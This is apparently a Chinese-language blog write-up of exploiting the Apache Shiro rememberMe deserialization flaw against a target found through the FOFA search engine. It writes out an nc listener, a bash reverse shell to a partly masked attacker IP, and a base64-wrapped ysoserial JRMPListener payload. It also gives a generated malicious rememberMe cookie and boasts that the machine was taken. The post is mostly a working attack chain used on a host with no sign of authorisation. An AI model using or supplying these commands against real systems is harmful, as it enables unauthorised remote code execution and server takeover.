Apache Shiro反序列化遠程代碼執行復現

1、尋找目標

首先FOFA找一個環境,檢測工具檢測一下

發現目標,開幹!

2、開啓監聽

首先在vps運行nc 監聽一個端口

nc -lvp 666

列出需要使用的反彈指令

bash -i >& /dev/tcp/129.204.xxx.xxx/666 0>&1

將指令放到http://www.jackson-t.ca/runtime-exec-payloads.html轉換成加密後的指令

將指令合成爲一個java的監聽指令

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections4 '加密後的指令'
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections4 'bash -c {echo,YmFzaCAtaxxxxxxxxxxxxxxxxxxxxxxxxxxxxkuMjA0LjExMy4yMDIvNjY2IDA+JjE=}|{base64,-d}|{bash,-i}'

3、利用poc生成cookie

我不是一個合格的網安人員。。

python2 -m pip install pycryptodome

安裝這個庫就可以了。

然後進入這個庫的目錄:Lib\site-packages

找到 crypto 這個庫,更改爲首字母大寫 Crypto 即可

得到cookie

rememberMe=3Wb6O2eQTCeimDMS1uEUQANKouApX2EvmE7yZfXgnZWN+pxrZ4jH+CTcjRPRyuMXFt1NbRzH+IZhT7yoiK87ptD2HcSqqGKw50bEeDWdKPV7UDix82FQx5SQpYpVipyXk6LNO/BMFtMzvEsdjB6b9hMsHqz8/WVPWtT6V3J1Iq8oXm1MBfLSe7y8zd4BtM1vru+FyUSVdkw5Bv2pkB7o0LrUkhtbM58PVlxFgMBtU2nE0fvClfeX5ay0WINJjeGC8KQzMP0SFsWnnAwcJG513sPd796ppfEI8+esJ57yfRpiPXmlz9ZFMx66tvsVU9Enq1dCXOLNQPWkz+uLf5VDOO80nV6R0f+7+EXY/egY7w+hWNKJwDngKXvuyINGhhOVOrEzneSfCtvD8tOadPcU7A==

抓包進行發送

彈回來了。

 

機器到手,溜了溜了。。。

4、小記

crontab從文件導入和導出到文件

#導入 
[root@localhost ~]# crontab filename 
#導出 
[root@localhost ~]# crontab -l >filename

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章